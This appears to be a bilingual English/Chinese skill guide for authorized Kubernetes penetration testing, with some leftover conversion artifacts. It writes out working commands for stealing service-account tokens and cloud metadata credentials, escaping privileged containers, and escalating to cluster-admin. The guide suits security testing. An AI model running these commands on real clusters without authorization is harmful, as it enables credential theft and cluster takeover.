Kubernetes Security Red Team

Kubernetes 安全红队测试

Perform offensive security testing of Kubernetes platforms including penetration testing, attack paths, and vulnerability assessment.

针对Kubernetes平台开展攻击性安全测试，包括渗透测试、攻击路径识别和漏洞评估。

Keywords

关键词

kubernetes, security, red team, penetration testing, pentest, attack, exploiting, exploit, privilege escalation, container escape, rbac, secrets, vulnerability, assessment, offensive, conducting, performing, running, testing, identifying, validating

When to Use This Skill

何时使用此技能

Conducting authorized penetration tests
Performing security assessments
Running red team exercises
Testing security controls
Identifying attack paths
Validating hardening measures

IMPORTANT: Only use these techniques on systems you have explicit written authorization to test.

执行授权渗透测试
开展安全评估
进行红队演练
测试安全控制措施
识别攻击路径
验证加固措施

重要提示：仅可在你获得明确书面授权的系统上使用这些技术。

Related Skills

Quick Reference

快速参考

Task	Command
Check permissions	`kubectl auth can-i --list`
Find privileged pods	`kubectl get pods -A -o json \| jq '.items[] \| select(.spec.containers[].securityContext.privileged==true)'`
List secrets	`kubectl get secrets -A`
Test anonymous access	`kubectl --as=system:anonymous auth can-i --list`

任务	命令
检查权限	`kubectl auth can-i --list`
查找特权Pod	`kubectl get pods -A -o json \| jq '.items[] \| select(.spec.containers[].securityContext.privileged==true)'`
列出密钥	`kubectl get secrets -A`
测试匿名访问	`kubectl --as=system:anonymous auth can-i --list`

Attack Surface

攻击面

External

外部

Kubernetes API (TCP 6443)
Ingress controllers (TCP 80, 443)
NodePort services (TCP 30000-32767)
Exposed dashboards
Cloud metadata endpoints

Kubernetes API（TCP 6443）
Ingress控制器（TCP 80、443）
NodePort服务（TCP 30000-32767）
暴露的仪表盘
云元数据端点

Internal (from compromised pod)

内部（从已攻陷的Pod发起）

Service account tokens
Secrets in environment/volumes
Network connectivity
Mounted volumes
Cloud IMDS

服务账户令牌
环境变量/卷中的密钥
网络连通性
挂载的卷
云IMDS

Reconnaissance

侦察

External

外部

bash

undefined

bash

undefined

Port scan

端口扫描

nmap -sV -p 6443,443,80,30000-32767 ${TARGET}

Check anonymous access

检查匿名访问

curl -k https://${API_SERVER}:6443/api/v1/namespaces

Test anonymous auth

测试匿名认证

kubectl --server=https://${API}:6443 --insecure-skip-tls-verify auth can-i --list

undefined

kubectl --server=https://${API}:6443 --insecure-skip-tls-verify auth can-i --list

undefined

Internal (from pod)

内部（从Pod内执行）

bash

undefined

bash

undefined

Current permissions

当前权限

kubectl auth can-i --list

SA token location

SA令牌位置

cat /var/run/secrets/kubernetes.io/serviceaccount/token

Enumerate

枚举资源

kubectl get namespaces kubectl get secrets -A kubectl get pods -A -o wide

undefined

kubectl get namespaces kubectl get secrets -A kubectl get pods -A -o wide

undefined

Attack Paths

攻击路径

1. Service Account Token Abuse

1. 服务账户令牌滥用

bash

TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
APISERVER=https://kubernetes.default.svc

curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
  $APISERVER/api/v1/namespaces/default/secrets

bash

TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
APISERVER=https://kubernetes.default.svc

curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
  $APISERVER/api/v1/namespaces/default/secrets

2. Privileged Container Escape

2. 特权容器逃逸

bash

undefined

bash

undefined

Mount host filesystem

挂载主机文件系统

mkdir /host && mount /dev/sda1 /host chroot /host

Or nsenter

或使用nsenter

nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash

undefined

nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash

undefined

3. RBAC Escalation

3. RBAC权限提升

bash

undefined

bash

undefined

Check dangerous permissions

检查危险权限

kubectl auth can-i escalate roles kubectl auth can-i bind clusterroles kubectl auth can-i impersonate users kubectl auth can-i create pods/exec

Escalate if can create rolebindings

若可创建角色绑定则进行权限提升

kubectl create rolebinding pwn --clusterrole=cluster-admin --user=$(whoami)

undefined

kubectl create rolebinding pwn --clusterrole=cluster-admin --user=$(whoami)

undefined

4. Cloud Metadata Exploitation

4. 云元数据利用

AWS:

bash

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

GCP:

bash

curl -H "Metadata-Flavor: Google" \
  http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token

Azure:

bash

curl -H "Metadata: true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

AWS:

bash

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

GCP:

bash

curl -H "Metadata-Flavor: Google" \
  http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token

Azure:

bash

curl -H "Metadata: true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

Cloud-Specific Attacks

云平台特定攻击

AWS EKS

IRSA token theft from projected SA volumes
Node IAM role abuse via IMDS
aws-auth ConfigMap manipulation
EKS cluster role misconfiguration

从投影SA卷窃取IRSA令牌
通过IMDS滥用节点IAM角色
操纵aws-auth ConfigMap
EKS集群角色配置错误

GCP GKE

Workload Identity token theft
Metadata concealment bypass
GKE node service account abuse
Anthos Config Management exploitation

窃取工作负载身份令牌
绕过元数据隐藏机制
滥用GKE节点服务账户
利用Anthos配置管理

Azure AKS

Azure AD Pod Identity abuse
Managed Identity exploitation
AKS RBAC misconfiguration
Key Vault access via MI

滥用Azure AD Pod Identity
利用托管身份
AKS RBAC配置错误
通过MI访问Key Vault

Vulnerability Assessment Tools

漏洞评估工具

Installation

安装

bash

undefined

bash

undefined

kubescape

brew install kubescape

trivy (includes cluster scanning, image scanning, and k8s misconfiguration detection)

trivy（包含集群扫描、镜像扫描和K8s配置错误检测）

brew install trivy


> **Note**: kube-hunter (formerly by Aqua Security) has been deprecated and is no longer maintained. Use `trivy k8s` for equivalent cluster vulnerability scanning.

brew install trivy


> **注意**：kube-hunter（原由Aqua Security开发）已被弃用，不再维护。请使用`trivy k8s`进行等效的集群漏洞扫描。

Running Scans

运行扫描

bash

undefined

bash

undefined

kubescape

kubescape scan framework nsa,mitre

trivy cluster scan (replaces kube-hunter)

trivy集群扫描（替代kube-hunter）

trivy k8s --report summary cluster

trivy targeted scan

trivy定向扫描

trivy k8s --namespace ${NAMESPACE} --report all

undefined

trivy k8s --namespace ${NAMESPACE} --report all

undefined

Testing Checklist

测试检查清单

Authentication

认证

Anonymous API access
Default dashboard credentials
Weak service account tokens
Missing token expiration

API匿名访问
仪表盘默认凭据
弱服务账户令牌
缺少令牌过期机制

Authorization

授权

Overly permissive RBAC
Privilege escalation paths
Cross-namespace access
Wrong secret access

权限过度宽松的RBAC
权限提升路径
跨命名空间访问
错误的密钥访问权限

Network

网络

Missing network policies
Unrestricted pod traffic
Metadata endpoint access
External exposure

缺少网络策略
Pod流量不受限制
元数据端点可访问
外部暴露风险

Container

容器

Privileged containers
Host namespace access
Writable root filesystem
Capabilities not dropped

特权容器
主机命名空间访问
根文件系统可写
未丢弃危险权限

MITRE ATT&CK Mapping

MITRE ATT&CK 映射

Technique	ID	Test
Valid Accounts	T1078	Token leakage
Container Admin	T1609	kubectl exec
Escape to Host	T1611	Privileged abuse
Credential Access	T1555	Secret enumeration
Lateral Movement	T1021	Pod-to-pod access

技术	ID	测试项
有效账户	T1078	令牌泄露
容器管理员	T1609	kubectl exec
逃逸到主机	T1611	特权滥用
凭据获取	T1555	密钥枚举
横向移动	T1021	Pod间访问

Reporting

报告

Finding Template

发现模板

markdown

undefined

markdown

undefined

[CRITICAL/HIGH/MEDIUM/LOW] Finding Title

[CRITICAL/HIGH/MEDIUM/LOW] 发现标题

Description: What the vulnerability is

Impact: What an attacker could do

Evidence:

Commands and output

Affected Resources:

Specific resources

Remediation:

Immediate fix
Long-term solution

References:

CIS control
MITRE technique

undefined

描述：漏洞具体内容

影响：攻击者可利用此漏洞执行的操作

证据:

执行的命令及输出

受影响资源:

具体资源

修复建议:

即时修复方案
长期解决方案

参考:

CIS控制项
MITRE技术

undefined

Common Mistakes

常见错误

Mistake	Why It Fails	Instead
Testing production clusters without written scope document	Causes unplanned outages; legal and compliance exposure	Get explicit written authorization defining scope, timing, and boundaries
Exploiting a vulnerability without documenting the steps	Finding cannot be reproduced or verified; remediation team cannot confirm fix	Record exact commands and outputs as you go
Leaving privileged pods or RoleBindings after testing	Attackers can reuse your test artifacts as real attack vectors	Clean up all artifacts immediately after each test phase
Assuming RBAC is the only access control	Network-level access, cloud IAM, and metadata endpoints bypass RBAC entirely	Test all attack surfaces: RBAC, network, cloud IMDS, runtime
Running scans at peak traffic hours	Scanning generates load; may trigger alerts and degrade user experience	Schedule intensive scans during maintenance windows

错误行为	失败原因	正确做法
未获得书面范围文档就测试生产集群	导致意外停机；面临法律和合规风险	获取明确的书面授权，定义测试范围、时间和边界
利用漏洞但未记录步骤	发现结果无法复现或验证；修复团队无法确认漏洞已修复	随时记录精确的命令和输出
测试后遗留特权Pod或RoleBindings	攻击者可将你的测试工件用作真实攻击向量	每个测试阶段结束后立即清理所有工件
假设RBAC是唯一的访问控制机制	网络级访问、云IAM和元数据端点可完全绕过RBAC	测试所有攻击面：RBAC、网络、云IMDS、运行时
在流量高峰时段运行扫描	扫描会产生负载；可能触发警报并降低用户体验	在维护窗口安排密集扫描

Ethical Guidelines

道德准则

Written authorization required before testing
Scope clearly defined and respected
No production data exfiltration
Report all findings responsibly
Clean up any artifacts created
Document everything for reproducibility

书面授权：测试前必须获得书面授权
明确范围：严格遵守已定义的测试范围
禁止数据泄露：不得泄露生产数据
负责任报告：如实报告所有发现
清理工件：清理所有测试期间创建的工件
完整记录：记录所有操作以便复现

k8s-security-redteam

Original

Translation

Kubernetes Security Red Team

Kubernetes 安全红队测试

Keywords

关键词

When to Use This Skill

何时使用此技能

Related Skills

相关技能

Quick Reference

快速参考

Attack Surface

攻击面

External

外部

Internal (from compromised pod)

内部（从已攻陷的Pod发起）

Reconnaissance

侦察

External

外部

Port scan

端口扫描

Check anonymous access

检查匿名访问

Test anonymous auth

测试匿名认证

Internal (from pod)

内部（从Pod内执行）

Current permissions

当前权限

SA token location

SA令牌位置

Enumerate

枚举资源

Attack Paths

攻击路径

1. Service Account Token Abuse

1. 服务账户令牌滥用

2. Privileged Container Escape

2. 特权容器逃逸

Mount host filesystem

挂载主机文件系统

Or nsenter

或使用nsenter

3. RBAC Escalation

3. RBAC权限提升

Check dangerous permissions

检查危险权限

Escalate if can create rolebindings

若可创建角色绑定则进行权限提升

4. Cloud Metadata Exploitation

4. 云元数据利用

Cloud-Specific Attacks

云平台特定攻击

AWS EKS

AWS EKS

GCP GKE

GCP GKE

Azure AKS

Azure AKS

Vulnerability Assessment Tools

漏洞评估工具

Installation

安装

kubescape

kubescape

trivy (includes cluster scanning, image scanning, and k8s misconfiguration detection)

trivy（包含集群扫描、镜像扫描和K8s配置错误检测）

Running Scans

运行扫描

kubescape

kubescape

trivy cluster scan (replaces kube-hunter)

trivy集群扫描（替代kube-hunter）

trivy targeted scan

trivy定向扫描

Testing Checklist